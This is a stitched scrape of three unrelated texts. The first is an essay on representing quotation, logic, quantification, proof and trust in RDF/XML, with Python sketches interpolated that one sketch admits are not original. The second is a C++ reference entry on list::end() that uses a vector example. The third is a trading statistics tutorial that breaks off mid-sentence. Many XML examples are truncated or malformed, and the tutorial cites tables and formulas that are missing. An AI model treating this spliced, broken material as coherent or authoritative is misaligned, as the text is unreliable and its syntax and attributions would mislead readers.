Assertions are not all equal. They are made in different documents by different people with different guarantees. They may be referred to, and even denied explicitly. The context of an assertion is therefore indispensable to its use. Context is inherited through nested XML elements unless an element of the following forms changes that. When an assertion is verified, evidence as to its veracity is accumulated and submitted to subjective criteria of trust assessment. While the eventual trust criteria are subjective, the logic of what is meant when data is put on the Web must be very well defined and unambiguous. An RDF statement in what RDF calls a model, but I call a formula, can be reified by four triples: three are needed to assert the subject, object, and predicate of the assertion, and one to assert that the triple is part of the given model (set of triples), since more than one model can exist. Reification therefore blows up the storage requirement by a factor of four. There is also a problem, when using a simple link between the context formula and the statement, that it is necessary to specify definitively the set of statements in a formula. There are a number of ways of doing this, including the DAML list "first/rest" method, giving the number of statements, and giving the relationship as, for example, "item_2_of_5". As these are inter-convertible, the choice is not fundamental. We will see how reification ends up being applied successively, making the verbosity quite unacceptable as a practical technique for representing formulae. Therefore, while we will derive each language feature simply by defining a new RDF property, to make it practically useful we will also need a syntax which allows the new language to be written less verbosely. Reification turns what is an explicit statement into a description of a statement which is not specifically asserted, but which is described and can be talked about. In languages this is typically done by quotation.
In RDF syntax to date there is no way of doing this, so let us start with that, as then we can do anything. There is no specific element for this yet, so let's assume a QUOTE element, which allows one to talk about assertions without asserting them. In the "Ralph said Ora wrote the book" example, "Ora wrote the book" is obviously quoted. We need a way of distinguishing between things we said and stand by, and statements we wish to discuss. This is going to be of primary importance on the Web, in which information from many sources is combined. It is a fundamental part of language design. (The PICS label system uses it, for example. In metadata, information about information, quotation is obviously essential.) One way would be:

<quote id="foo">
  <dc:author>Ora</dc:author>
</quote>
<rdf:description>
  <dc:author>Ralph</dc:author>
  <http:from>swick@w3.org</http:from>
</rdf:description>

Here the quoted part says that Ora wrote the book, and then the description following it asserts that Ralph made the assertion. This is not to be confused with a quote which maintains that it itself was written by Ralph, but for which the present author makes no claim of truth or anything else:

<quote id="foo">
  <rdf:description>
    <dc:author>Ralph</dc:author>
    <http:from>swick@w3.org</http:from>
  </rdf:description>
  <dc:author>Ora</dc:author>
</quote>

If it becomes common, it would be even simpler if we defined a shortcut element <head> to mean "about my enclosing parent element":

<quote about="theBook">
  <head>
    <dc:author>Ralph</dc:author>
    <http:from>swick@w3.org</http:from>
    <follows-from></follows-from>
  </head>
  <dc:author>Ora</dc:author>
</quote>

In fact one could make <quote> basically identical to <rdf:Description> except for disavowing the assertions contained. [This was, I understand, considered by the RDF working group].
(see also daml:imports of Oct 2000 and Dan's GET/PUT model) Just as it is important to be able to exclude assertions within a document from the set asserted directly by the document, it is equally important to be able to include assertions which are in fact not in the document. This is easy to do with another property. It is, after all, a single assertion indicating that B should be believed to the extent that you believe A.

<foo:bar>
  <head>
    <include rdf:
    <include rdf:
    <include rdf:
  </head>
</foo:bar>

This document, of some type we need not worry about, is from the semantic point of view deemed to include the information in part1.rdf, part2.rdf, and part3.rdf. We use HEAD here as a shortcut for setting the subject to be the current document. (This is NOT a textual inclusion; it only brings across the semantics of the other document, parsed with no context from this one. If the destination document includes HTML or SMIL, the text and graphics for human consumption are NOT invoked in any way!) There is no information provided as to how or why to trust those documents. The statement is only about the meaning of this document. It is important to separate meaning and trust in the language. (Deciding on a name for this is really difficult, to get people to follow this very basic logical function. "Vouch" is a nice word, meaning "asserts the truth of". "Imply" is a nice word as it contains the fact that it is a relationship between one document and another: if you don't believe the first you don't have to believe the second. "Assert" or "IsTrue" are other possibilities.) It is overcomplicated to represent this as a binary relationship between the current document and the document vouched for. It really is a unary relationship true(f) expressed in the current document. That would need an XML shortcut rather than an RDF property, though, which would score less on cleanliness.
But it is simpler:

<foo:bar>
  <assert href="part1.rdf" />
  <assert href="part2.rdf" />
  <assert href="part3.rdf" />
</foo:bar>

Alternatively you can make a statement of the truth of the document:

<rdf:description>
  <truth>1</truth>
</rdf:description>

This is straightforward too, and begs the question of what happens if you say "0" instead of "1":

<rdf:description>
  <truth>0</truth>
</rdf:description>

We don't have a form for logical expressions for the semantic web, although of course logical expressions in human-readable documents are covered by MathML. The practical need for logical expressions has been apparent in the IETF's work on profiling in the "conneg" group, and in the W3C's internal work on access control. (No comment needs to be made about the huge number of languages which allow logical expression.) In the classification of languages, normally logic is introduced before the ability to make statements about statements -- or rather, it was until Gödel. Here, the "first order" question is taken backwards, in that RDF statements already break the "first order" assumptions before basic logic has been introduced. Not extends the toolbox to propositional logic. Of course we already have the logical "AND" construction by juxtaposition. Two statements one after the other are both to be trusted to the same extent as the context. It is difficult to contemplate a logical system in which two statements cannot be considered together, so { S1, S2 } == S1 & S2 more or less defines "&", and since juxtaposition already exists, we already have it. One of the simplest forms of expression is NOT(x), which maps onto XML most naturally as a single XML element:

<bar id="foo" about="">
  <w3c:member></w3c:member>
  <not>
    <w3c:member></w3c:member>
  </not>
</bar>

The not is transparent when it comes to the subject, but clearly not when it comes to the trust! It is an explicit assertion that the contained assertion is false.
I am not proposing that the best machine in practice to process the language we are building is based directly on RDF triples, but it is important to ground new features in basic RDF. In RDF, not can be introduced by a new property which associates a boolean truth value with another node. (Actually manipulating the information in this way is of course not very efficient.)

<quote id="foo" about="">
  <w3c:member></w3c:member>
</quote>
<rdf:description>
  <truth>0</truth>
</rdf:description>

There is an overlap of semantics with <include>. There are therefore two ways of representing an expression containing not. The strict RDF way, in which the only data is a set of triples, involves the reification above. The way using the enhanced model simply encodes each. Before not, every assertion in an RDF database could be handled independently, and deletion of a fact did not create untruth. However, with not, it can, because we need to know the full set of terms in a negated and-expression to be able to deduce anything. Not is very powerful. Given not and and, as logicians and gate designers know, you can construct many things. Immediately, given that the contents of a not element are anded, we have a "nand" function. ["Nand" is the Sheffer stroke, which was shown in 1913 to be the only operator needed to construct a complete propositional logic system, and which in the 1970s was the basic building-block unit of the 7400 series logic.] With nand, you can construct, for example, or:

<not>
  <not>
    <w3c:member></w3c:member>
  </not>
  <not>
    <w3c:member></w3c:member>
  </not>
</not>

is equivalent to "either IBM is a member of W3C or soap.com is a member of W3C". It is a little clumsy, but looks more natural if you use synonyms:

<alternatives>
  <or>
    <w3c:member></w3c:member>
  </or>
  <or>
    <w3c:member></w3c:member>
  </or>
</alternatives>

Implication can also be constructed using not.
"If soap.com is a member then IBM is a member" can be written as "it is not true that soap.com is a member and IBM is not a member", or:

<not>
  <w3c:member></w3c:member>
  <not>
    <w3c:member></w3c:member>
  </not>
</not>

This similarly can be made more palatable to the human reader by using synonyms for not:

<if>
  <w3c:member></w3c:member>
  <then>
    <w3c:member></w3c:member>
  </then>
</if>

Above we had an example in which we invoked, using <include>, the meaning in another document. We can make such inclusions conditional:

    <include rdf:
  </then>
</if>
<if>
  <ds:signed-by rdf:about="part2.rdf">
    rsa:a/1024/123hg1238912whh3983yd2734dg
  </ds:signed-by>
  <then>
    <include rdf:
  </then>
</if>
</head>
</foo:bar>

Here the document asserts the contents of part1 only if it has a certain hash, and asserts the content of part2 only if it has a digital signature which verifies with a particular public key. (The ds namespace is assumed to exist to define hash and signed-by, and is not further discussed here apart from pointing out that the hash value is an existing URI md5 scheme and that the RSA key is just regarded as a URI too.) What is nice about this section is that this functionality has been achieved using existing features. The two statements may be a little verbose, though it isn't obvious how one can make them very much more compact. The examples above are very specific, when in fact many rules are made about generalities. How would we add quantification to XML, the "for all" or "there exists some"? Like anything else, you can introduce it into RDF by reifying it (to describe the expression's structure and then assert something about the structure).
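The claim above, that not plus the implicit and (i.e. a nand) suffices to build or and implication, can be checked mechanically. Here is a small Python sketch, not part of the original document, that enumerates every truth assignment:

```python
from itertools import product

# Primitive connective, mirroring the XML <not> element whose
# contents are implicitly ANDed: not(a and b and ...) is a NAND.
def nand(*args):
    return not all(args)

# Derived connectives, built only from nand, as in the XML examples:
def not_(a):
    return nand(a)                    # <not> a </not>

def or_(a, b):
    return nand(not_(a), not_(b))     # <not><not>a</not><not>b</not></not>

def implies(a, b):
    return nand(a, not_(b))           # <not> a <not>b</not> </not>

# Verify against the usual truth tables for every assignment.
for a, b in product([False, True], repeat=2):
    assert or_(a, b) == (a or b)
    assert implies(a, b) == ((not a) or b)
print("nand-derived or/implies match the truth tables")
```

This is exactly the 1913 Sheffer-stroke result the text cites: one operator, everything else derived.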
Formally, then, to build it by tedious reification, one would:

<quote id="foo" about="">
  <w3c:member></w3c:member>
</quote>
<rdf:description>
  <true-for-all></true-for-all>
</rdf:description>

In this example (compare with the not reification above) the element expressing the "W3C has a member soap" statement is given the identifier #foo, and then the assertion is made that the statement represented is true even when "" is replaced with any other value. This may not be an intuitive way of quantifying things, and the variable name may seem bizarre, but it shows that we can derive quantification from a single added RDF property, "true-for-all" [note].

Quantification syntax for logic in XML

It is not obvious how to add this to a practical XML-based toolbox. One can either try to layer it on top of XML, or extend XML. Here is one example of layering it on top of XML. We use an XML element for the forall clause, defining a variable at the same time in the ID space of the XML document. Any reference to that variable within the clause is to be taken to refer to the variable. This, translated, means: for any X, if X is a member of W3C, then X has access to the member page, and there is some rep which is an advisory committee representative for X and also is an employee of X. It is messy compared with mathematical symbols, but not compared with typical XML. The var attribute defines a variable in ID space (a subset of URI space), so it must have type IDREF, because to have type ID in XML has the secondary meaning of being an identifier for the element. (An alternative might be to use XML entities in a magic new form of entity &x; or to simply make a new syntax which declares $x to be a variable, even though you get really fed up with the dollar signs; or, if you want an interesting one, to make a namespace which is defined to consist of variables. This latter would maybe confuse engines which didn't understand it.)
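The reading of a forall clause as "true under every substitution for the variable" can be illustrated with a toy triple store. This is an illustrative sketch only; the predicate names are invented for the example, and real RDF rule engines are far more involved.

```python
# A tiny forward-chaining sketch: triples are (subject, predicate, object),
# and the rule is: for all x, if (x, "w3c:member-of", "w3c")
# then (x, "access", "member-page").
triples = {
    ("ibm.com", "w3c:member-of", "w3c"),
    ("soap.com", "w3c:member-of", "w3c"),
}

def apply_forall(store, if_pred, if_obj, then_pred, then_obj):
    """Substitute every matching subject for the quantified variable
    and add the derived triples to the store."""
    derived = {
        (s, then_pred, then_obj)
        for (s, p, o) in store
        if p == if_pred and o == if_obj
    }
    return store | derived

closed = apply_forall(triples, "w3c:member-of", "w3c", "access", "member-page")
print(("ibm.com", "access", "member-page") in closed)  # -> True
```

The rule fires once per binding of the variable, which is exactly what the "true-for-all" property asserts about the reified statement.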
(Note that XML namespaces don't use scoping, but a "forall" clause necessarily introduces a variable which only has significance within the scope of the clause (the element, in this syntax). However, it may be referred to from outside when a substitution is defined. You will want to say, for example, "substituting "John Doe" for the variable foo.rdf#name in foo.rdf#rule1 yields ...", so the fact that the variable is a first-class object may possibly be useful. Beware, of course, that you may want in one formula to use the quantified expression more than once using different substitutions.)

In the 1.0 syntax spec there is a special syntax for a particular form of quantification:

<rdf:Description
  <s:Creator>Ora Lassila</s:Creator>
</rdf:Description>

This we can now explain as meaning:

<forall var="x">
  <if>
    <rdf:li
    <then>
      <s:Creator>Ora Lassila</s:Creator>
    </then>
  </if>
</forall>

A very common thing we need to express is a definitive set of things. (An example of a definitive list: when W3C gives a list of W3C members, it can not only tell you that if someone is on the list they are a member, but also that if they are not on the list they are not.) The exclusivity of a list is a statement about a document or part of a document.
Here is a statement about the definitive nature of a list, followed by a list:

<forall var="x">
  <if rdf:
    <w3c:member id="statement" about=""><var ref="#x"> </w3c:member>
    <then>
      <implies rdf:
    </then>
  </if>
</forall>
<foo:container
  <w3c:member>"</w3c:member>
  <w3c:member>"</w3c:member>
  <w3c:member>"</w3c:member>
  <w3c:member>"</w3c:member>
  <w3c:member>"</w3c:member>
</foo:container>

Note that just as in normal algebra one almost always uses "for all" with "such that", here one will almost always use <forall> with <if>, and so the two could be combined to save space into, say, <ifany>:

<ifany var="x" rdf:
  <w3c:member id="statement" about=""><var ref="#x"> </w3c:member>
  <then>
    <implies rdf:
  </then>
</ifany>
<foo:container
  <w3c:member>"</w3c:member>
  <w3c:member>"</w3c:member>
  <w3c:member>"</w3c:member>
  <w3c:member>"</w3c:member>
  <w3c:member>"</w3c:member>
</foo:container>

This is done using features defined to date. (It is a little verbose, but we could make a shorthand for the expression "list A is object-definitive for B", meaning "if list A implies the statement <B about=x value=V> for some (x,V) then it will also imply any statement <B about=y value=V> which is true". In other words, "ibm is a member of w3c" in an object-definitive list means that the list will include all members of w3c, whereas in a subject-definitive list it implies that the list contains all things ibm is a member of:

<foo:container
  <w3c:member>"</w3c:member>
  <w3c:member>"</w3c:member>
  <w3c:member>"</w3c:member>
  <w3c:member>"</w3c:member>
  <w3c:member>"</w3c:member>
</foo:container>
<object-definitive:w3c:member
</object-definitive> )

A function is the ability to encapsulate meaning with the extraction of parameters to be specified later. This could map onto RDF and XML in a number of ways, just as practical languages have various forms of function. When looking at the expression of data, a function becomes a compact expression of a common expression.
The shorthand expression can take many forms (positional or named parameters), but a clear choice for RDF is an RDF node whose actual arguments [the things which at function invocation replace the formal parameters] are provided by a set of properties of that node. The equivalent of the function "body" is then a set of information which can be deduced from the node. An interesting point of the semantic web philosophy is that, while one might think of "the" meaning of a function, in fact the inference rules which express that are those provided by the function's creator, but any other document might add its own rules. In other words, the function body is not a very useful term, and any expression about the function will do. The example above in fact is an example. It states some implications of the concept of membership of W3C. You could take this to be definitive, but that is really part of the trust model rather than the language. In other words, W3C might say that if an organization is a member of W3C then it has an AC representative who is an employee. Another may maintain that any organization which is a member of W3C contains at least one smart employee. I would expect that, where particular RDF nodes are intended to express particular things by their creators, the schema would have at least a pointer to those things. In the above example, the inference was just from a property of membership: a property is used as a binary predicate, but in general the n-ary form with multiple parameters could look like:

<forall var="x" v2="y" v3="z" rdf:
  <if>
    <employee>
      <name>#y</name>
      <street>#s</street>
      <zip>#z</zip>
    </employee>
    <then> [...] </then>
  </if>
</forall>

The basic RDF utility allows us to write all kinds of forms, and it may be useful to pick one to make a common form. In the example above, the rule applied to any node which is the employee (of anything) and has a name and a street. The property name "employee" is used like a function name.
We can use types for this instead:

<forall var="x" v2="y" v3="z" rdf:
  <if>
    <rdf:type></rdf:type>
    <z:name>#y</z:name>
    <z:street>#s</z:street>
    <z:zip>#z</z:zip>
    <then> [...] </then>
  </if>
</forall>

Here the rule applies to any node which has been explicitly given the type empType and has the given parameters. Of course, these two things are linked by the RDF schema type properties. rdfs:range (sp?) is a way of saying:

<forall var="x" v2="y" rdf:
  <if>
    <employer>#y</employer>
    <then>
      <rdf:type></rdf:type>
    </then>
  </if>
</forall>

In fact, while we are talking about functions, we can use what we have now to define bits of the RDF Schema specification. We can start by defining what the "range" of a property means:

<forall var="aPropertyName" v2="y" v3="aType" rdf:
  <if>
    <rdfs:range>#aType</rdfs:range>
    <then>
      <if>
        <#aPropertyName>#y</>   <!-- oops! -->
        <then>
          <rdf:type></rdf:type>
        </then>
      </if>
    </then>
  </if>
</forall>

I knew we would need a way of invoking an RDF assertion by its full ID. This is the identifier problem introduced above.

<#aPropertyName>#y</>   <!-- oops! -->

is what we need, and we can't do that in XML, but we can instead define in the basic RDF syntax an XML element to do it:

<rdf:property>#y</>   <!-- better! -->

which is not as clean in the sense of a consistent language, but is good XML. @@@ There are times when you may know that every person has a mother, and you may know that a person's mother is unique, and so it is convenient to save the bother of writing "for any x such that x is a's mother" and simply refer to a's mother. (This is similar in concept to the Skolem functions used to remove quantifiers from expressions in symbolic logic.) Maybe it is time for an XML shortcut: <the pname="#mother" of="#a"> can be thought of as a query as well. It is well defined when the property is unique, but when a property is not unique then it is not obvious what sort of implicit quantification should be implied, and what the scope of it would be ... not obvious.
Two choices appear to match the choice of definite and indefinite article in natural languages. The latter is the way it is used in Skolemization, and I think we should stick to that. Note that these are NOT functions. They are not part of the language. They are shortcuts. This is not about constructing a proof, but about transmitting a proof to be validated. To define the proof language, one must define the powers of the proof-checking machine. In other words, do you have to spoon-feed it every atomic step, or is there a certain jump which it can make? This decision does not have to be fundamental, in that you can imagine different vocabularies for expressing a proof to different engines which have different capabilities. At one extreme is the simplest logical engine, for which everything must be reduced to a canonical form of binary operators. At the other extreme is the proof "A follows-indirectly-from B", which involves the proof checker in extensive (but bounded, or we don't call it a proof) searches. In between lies the sound engineering compromise. This will not be a rigorous derivation, but a . [@@ref] Now we need an expression to lead the proof-checker through a proof. Let's assume that canonicalization is implicit, in that it just involves resolving relative URIs, and that otherwise exact string comparison implies equivalence. (In practice there are often different URIs which yield the same result, but that can be an equivalence statement we can explicitly make if ever we need to.) In the case that a given document [fragment] allows the proof checker to deduce the required result directly, all one needs is a single RDF assertion to point it at the source from which it follows. We therefore introduce the <follows-from> assertion: all the information A was derived from information in B. This is a tool for the "oh, yeah?" button. It allows one to trace back to the origin of an assertion or assertions.
In order to verify the assertions, A is abandoned as being only a hint, and B is parsed to extract the same meaning, and then verified. No representation is made about the language in which B is written or why B should be believed.

<a:record
  <w3c:member></w3c:member>
</a:record>
<rdf:description
  <follows-from></follows-from>
</rdf:description>

The assertion that IBM is a member of W3C is implied by the W3C membership list. (Does the document assert that you can still deduce the statements from the document? Yes, formally: an assertion is an assertion. However, if you don't trust the current document, typically you treat it as an invitation to check the URI given. Later we must deal with expiry over time, and with "I found yyy in xxx but don't trust me: you check" statements which do not lend explicit credence.)

...... @@@@@@ The above deals with logic, when in fact any deduction in the real world or on the Web is made according to rules of trust. On the Web, trust is enhanced by the power of public-key cryptography, and in particular digital signature. The W3C Signed XML activity defines ways of signing an XML document so that it can be shown to have been signed by the private key corresponding to a given public key. The following is a model of trust which seems powerful and general. The basic concept is that of a statement being "assured by" a set of keys. (This is a new word, and if you can think of a better one, let me know.) It means that the statement either has been made in a document (or part of a document) whose signature has been verified with the key, or has been logically derived from such statements. When it is logically derived from a combination of statements assured by different sets of keys, then it is assured by the union of the sets.
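The "assured by" bookkeeping described above (union of key sets under conjunction, and reduction when a rule signed by one key vouches for statements signed by others) can be sketched in a few lines of Python. This is an assumption-laden toy, not any real trust engine; the key names Ka, Kb, and K are invented to match the prose example that follows.

```python
# Each derived statement carries the set of keys that assure it.

def conjoin(assured_a, assured_b):
    """(S assured by set A) and (T assured by set B)
    gives (S and T) assured by the union A | B."""
    return assured_a | assured_b

def apply_trust_rule(rule_key, vouched_keys, statement_key):
    """A rule signed by rule_key saying 'statements signed by any key in
    vouched_keys are true' re-assures such a statement under rule_key
    alone; otherwise the rule says nothing (None)."""
    if statement_key in vouched_keys:
        return {rule_key}
    return None

a_keys = {"Ka"}   # statement A, verified with key Ka
b_keys = {"Kb"}   # statement B, verified with key Kb

# Without any rule, A and B together are assured by the union {Ka, Kb}.
both = conjoin(a_keys, b_keys)

# With a rule signed by K vouching for Ka and Kb, each reduces to {K}.
a_via_k = apply_trust_rule("K", {"Ka", "Kb"}, "Ka")
b_via_k = apply_trust_rule("K", {"Ka", "Kb"}, "Kb")
print(sorted(both))  # -> ['Ka', 'Kb']
```

This mirrors the observation in the text that a processor's key set can shrink as well as grow: a single trusted rule key can stand in for many signing keys.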
(You can think about it in terms of belief if you like: if you believe all the keys in the set, you will believe the statement. But that is not a useful analogy, as the model does not require agents to actually "believe" anything.) While from the rules defining assurance you might expect a logical processor to accumulate a larger and larger key set as information is drawn in from more and more sources, in fact the key set can reduce too. Suppose you have found on the web statement A signed by key Ka, and statement B signed with key Kb. If a third statement, signed with key K, says "If A is signed with Ka it is true, and if B is signed with Kb it is true," then you can deduce A and B assured by K. I would expect a typical trust engine to have one key which it trusts basically from installation. For a webserver, for example, the webmaster holds the key. The server will only act on something which is assured by that key. The various configuration files then contain trust rules which delegate responsibility for particular aspects of operation. Many trust engines (whether or not they think of themselves as trust engines) use simpler rules which are specializations of this general model. One is the simple trust boundary: "Trust the following keys for anything, anything else for nothing". This is typical of the configuration of a web browser for trusting applets. It obviously works because it is only responsible for certain decisions, and in fact the user is also involved with every one as well, before the downloaded code is executed. (This binary model of trust leads to that binary concept of "belief".) The most general rule I can think of is of the form "if a statement of the form x follows from key set y then deduce f(x)." This would, of course, typically be signed with another key. (If we assume a key is a URI, then we can declare key sets as URIs too, by just using unique identifiers.
This means that the problem of dealing with sets can be hidden from the logic if we need to simplify it. We just declare a key set, give it a mid: URI, and declare which RSA (say) keys it contains. I don't think the key set idea is very fundamental - we just seem to need it for completeness, so that we can extract the assuring keys from separate statements: from "A assures S and B assures T", deduce "set {A B} assures S and T". Maybe we can get away without that extraction, using nesting instead, `A assures `B assures S & T' ') @@ homework: express published trust models in this general trust model. Examples of trust rules "If K assures that y is a member of w3c then they are" Doing this without any extra <ifany varid="x"> @@@@@@ <then> </then> </ifany> XML is clearly a (terrible, great) way of representing formal logic and trust. These are some random assertions about assertions, in particular the topology of the DLGs which they make and the inferences which can be directly made. Within this list, the semantics are explained for when the assertion is made about A and the property is given as having value B. Semantics: Any assertion using the property type A implies an assertion with the same subject node and value but with property type B. Comment: Domain and Range: The subject and object must both identify RDF assertions. Example <implies rdf: If A is "from" B then A is responsible for B in this vocabulary. Semantics: Any assertion using the property type A implies an assertion with property type B in the reverse direction - ie whose subject was the value of A and whose value was the subject of A. Comment: Domain and Range: The subject and object must both identify RDF assertions. Note some relations are self-inverse. "Inverse" is self-inverse. <implies rdf: If A is "part-of" B then A "includes" B in this vocabulary. ...@@@ [Notes Thanks to Dan Connolly for pointing this out. these always seem to disappear... there are many small lists of these, all different.
BAN logic @@ Appel et al.'s work at Princeton on Proof-Carrying Authentication: Proof-Carrying Authentication. Andrew W. Appel and Edward W. Felten, 6th ACM Conference on Computer and Communications Security, November 1999.
http://www.w3.org/DesignIssues/Toolbox.html
Syntax: #include <list> iterator end(); const_iterator end() const; The end() function returns an iterator just past the end of the list. Note that before you can access the last element of the list using an iterator that you get from a call to end(), you'll have to decrement the iterator first. For example, the following code uses begin() and end() to iterate through all of the members of a vector: vector<int> v1( 5, 789 ); vector<int>::iterator it; for( it = v1.begin(); it != v1.end(); it++ ) { cout << *it << " "; } Since the loop runs until it reaches v1.end(), one past the last element of the vector, the loop will only stop once all of the elements of the vector have been displayed. end() runs in constant time. Related Topics: begin, rbegin, rend
http://www.cppreference.com/wiki/stl/list/end
Introduction What is statistics? Here is the definition found on Wikipedia: "Statistics is the study of the collection, organization, analysis, interpretation, and presentation of data." (Statistics). This definition suggests three main components of statistics: data collection, measurement and analysis. Data analysis appears to be especially useful for a trader as information received is provided by the broker or via a trading terminal and is already measured. Modern traders (mostly) use technical analysis to decide whether to buy or sell. They deal with statistics in virtually everything they do when using a certain indicator or trying to predict the level of prices for the upcoming period. Indeed, a price fluctuation chart itself represents certain statistics of a share or currency in time. It is therefore very important to understand the basic principles of statistics underlying the majority of mechanisms that facilitate the decision making process for a trader. Probability Theory and Statistics Any statistics is the result of change in the states of the object that generates it. Let us consider a EURUSD price chart on hourly time frames: In this case, the object is the correlation between two currencies, while the statistics is their prices at every point of time. How does the correlation between two currencies affect their prices? Why do we have this price chart and not a different one at the given time interval? Why are the prices currently going down and not up? The answer to these questions is the word 'probability'. Every object, depending on probability, can take one or another value. Let us do a simple experiment: take a coin and flip it a certain number of times, every time recording the toss outcome. Suppose we have a fair coin. Then the table for it can be as follows: The table suggests that the coin is equally likely to come up heads or tails. 
Any other outcome is not possible here (landing on the coin's edge has been excluded a priori) as the sum of probabilities of all possible events shall be equal to one. Flip the coin 10 times. Now let us look at the toss outcomes: Why do we have these results if the coin is equally likely to land on either of the sides? The probability of the coin to land on either of the sides is indeed equal, which however does not mean that after a few tosses the coin shall land on one side as many times as on the other side. The probability only shows that in this particular attempt (toss) the coin will land either heads up or tails up and both events stand equal chances. Let us now flip the coin 100 times. We get the new table of outcomes: As can be seen, the numbers of outcomes are again not equal. However, 53 to 47 is the result that proves the initial probability assumptions. The coin landed on heads in nearly as many flips as it did on tails. Now let us do the same in the reverse order. Suppose we have a coin but the probability of landing on its sides is unknown. We need to determine if it is a fair coin, i.e. the coin that is equally likely to come up heads or tails. Let us take the data from the first experiment. Divide the number of outcomes per side by the total number of outcomes. We get the following probabilities: We can see that it is very difficult to conclude from the first experiment that the coin is fair. Let us do the same for the second experiment: Having these results at hand, we can say with a high degree of accuracy that this is a fair coin. This simple example allows us to draw an important conclusion: the bigger the number of experiments, the more accurately the object properties are reflected by statistics generated by the object. Thus, statistics and probability are inextricably intertwined. Statistics represents experimental results with an object and is directly dependent on probability of the object states. 
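The convergence claim above - more experiments give a better estimate of the underlying probability - can be checked with a quick simulation. This is plain Python rather than the article's MQL5, and the seed is fixed only so the run is reproducible:

```python
import random

random.seed(42)  # fixed seed for a reproducible "experiment"

def estimate_heads_probability(tosses):
    """Flip a fair coin `tosses` times and estimate P(heads) from the counts,
    exactly as the article does: outcomes per side / total outcomes."""
    heads = sum(random.random() < 0.5 for _ in range(tosses))
    return heads / tosses

few = estimate_heads_probability(10)
many = estimate_heads_probability(100_000)

# With 100,000 tosses the estimate is very close to the true 0.5;
# with only 10 tosses it can easily be 0.3 or 0.7.
assert abs(many - 0.5) < 0.01
print(few, many)
```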
Conversely, the probability of the object's states can be estimated using statistics. Here is where the main challenge for a trader lies: having data on trades over a certain period of time (statistics), to predict the price behavior for the following period of time (probability) and based on this information to make a buy or sell decision. Therefore, getting back to the points made in Introduction, it is also important to know and understand the relationship between statistics and probability, as well as to have knowledge of risk assessment and risk situations. The latter two are however out of the scope of this article. Basic Statistical Parameters Let us now review the basic statistical parameters. Suppose we have data on height in cm regarding 10 people in a group: The data set forth in the table is called sample, while the data quantity is the sample size. We will take a look at some parameters of the given sample. All parameters will be sample parameters as they result from the sample data, rather than random variable data. 1. Sample mean Sample mean is the average value in the sample. In our case, it is the average height of people in the group. To calculate the mean, we should: - Add up all sample values. - Divide the resulting value by the sample size. Formula: Where: - M is the sample mean, - a[i] is the sample element, - n is the sample size. Following the calculations, we get the mean value of 174.5 cm 2. Sample variance Sample variance describes how far sample values lie from the sample mean. The larger the value, the more widely the data is spread out. To calculate the variance, we should: - Calculate the sample mean. - Subtract the mean from each sample element and square the difference. - Add up the resulting values obtained above. - Divide the sum by the sample size minus 1. Formula: Where: - D is the sample variance, - M is the sample mean, - a[i] is the sample element, - n is the sample size. The sample variance in our case is 113.611. 
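The same ten height values appear as arrX in the article's MQL5 script; a Python transcription (not the article's code) of the two calculations above reproduces the stated mean of 174.5 and variance of 113.611:

```python
heights = [173, 162, 194, 181, 186, 159, 173, 178, 168, 171]  # arrX from the script
n = len(heights)

# Sample mean: sum of the values divided by the sample size.
mean = sum(heights) / n
assert mean == 174.5

# Sample variance: squared deviations from the mean, divided by n - 1.
variance = sum((a - mean) ** 2 for a in heights) / (n - 1)
assert round(variance, 3) == 113.611
```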
The figure suggests that 3 values are widely spread out of the mean which leads to the large variance value. 3. Sample skewness Sample skewness is used for describing the degree of asymmetry of the sample values around its mean. The closer the skewness value is to zero, the more symmetrical the sample values are. To calculate the skewness, we should: - Calculate the sample mean. - Calculate the sample variance. - Add up cubed differences of each sample element and the mean. - Divide the answer by the variance value raised to the power of 3/2. - Multiply the answer by the coefficient equal to the sample size divided by the product of the sample size minus 1 and sample size minus 2. Formula: Where: - A is the sample skewness, - D is the sample variance, - M is the sample mean, - a[i] is the sample element, - n is the sample size. We get a quite small value of skewness for this sample: 0.372981. This is due to the fact that divergent values compensate each other. The value will be larger for an asymmetrical sample. E.g. the value for the data as below will be 1.384651. 4. Sample kurtosis Sample kurtosis describes the peakedness of the sample. To calculate kurtosis, we should: - Calculate the sample mean. - Calculate the sample variance. - Add up the fourth-power differences of each sample element and the mean. - Divide the answer by the squared variance. - Multiply the resulting value by the coefficient equal to the product of the sample size and the sample size plus 1, divided by the product of the sample size minus 1, sample size minus 2 and sample size minus 3. - Subtract from the resulting value the product of 3 and the squared difference of the sample size and 1, divided by the product of the sample size minus 2 and sample size minus 3. Formula: Where: - E is the sample kurtosis, - D is the sample variance, - M is the sample mean, - a[i] is the sample element, - n is the sample size. For the given height data, we get the value of -0.1442285.
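Transcribing these steps into Python (using the standard adjusted sample formulas, which the stated results match numerically) reproduces the skewness of 0.372981 and kurtosis of -0.1442285 for the height sample:

```python
heights = [173, 162, 194, 181, 186, 159, 173, 178, 168, 171]
n = len(heights)
mean = sum(heights) / n
variance = sum((a - mean) ** 2 for a in heights) / (n - 1)

# Sample skewness: cubed deviations over variance^(3/2),
# times the coefficient n / ((n-1)(n-2)).
skew = (n / ((n - 1) * (n - 2))) \
    * sum((a - mean) ** 3 for a in heights) / variance ** 1.5
assert abs(skew - 0.372981) < 1e-5

# Sample (excess) kurtosis: fourth-power deviations over variance^2,
# times n(n+1) / ((n-1)(n-2)(n-3)), minus 3(n-1)^2 / ((n-2)(n-3)).
kurt = (n * (n + 1) / ((n - 1) * (n - 2) * (n - 3))) \
    * sum((a - mean) ** 4 for a in heights) / variance ** 2 \
    - 3 * (n - 1) ** 2 / ((n - 2) * (n - 3))
assert abs(kurt - (-0.1442285)) < 1e-5
```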
For sharper-peaked data, we get a larger value: 10. 5. Sample covariance Sample covariance is a measure indicating the degree of linear dependence between two data samples. Covariance between linearly independent data will be 0. To illustrate this parameter, we will add weight data for each of the 10 persons: To calculate covariance of two samples, we should: - Calculate the mean of the first sample. - Calculate the mean of the second sample. - Add up all products of two differences: the first difference - an element of the first sample minus the mean of the first sample; the second difference - an element of the second sample (corresponding to the element of the first sample) minus the mean of the second sample. - Divide the answer by the sample size minus 1. Formula: Where: - Cov is the sample covariance, - a[i] is the element of the first sample, - b[i] is the element of the second sample, - M1 is the sample mean of the first sample, - M2 is the sample mean of the second sample, - n is the sample size. Let us calculate the covariance value of the two samples: 91.2778. The existing dependence can be shown in the combined chart: As can be seen, the increase in height (as a rule) corresponds to the increase in weight and vice versa. 6. Sample correlation Sample correlation is also used to describe the degree of linear dependence between two data samples but its value always lies within the range of -1 to 1. To calculate correlation of two samples, we should: - Calculate the variance of the first sample. - Calculate the variance of the second sample. - Calculate covariance of these samples. - Divide the covariance by the square root of the product of the variances. Formula: Where: - Corr is the sample correlation, - Cov is the sample covariance, - D1 is the sample variance of the first 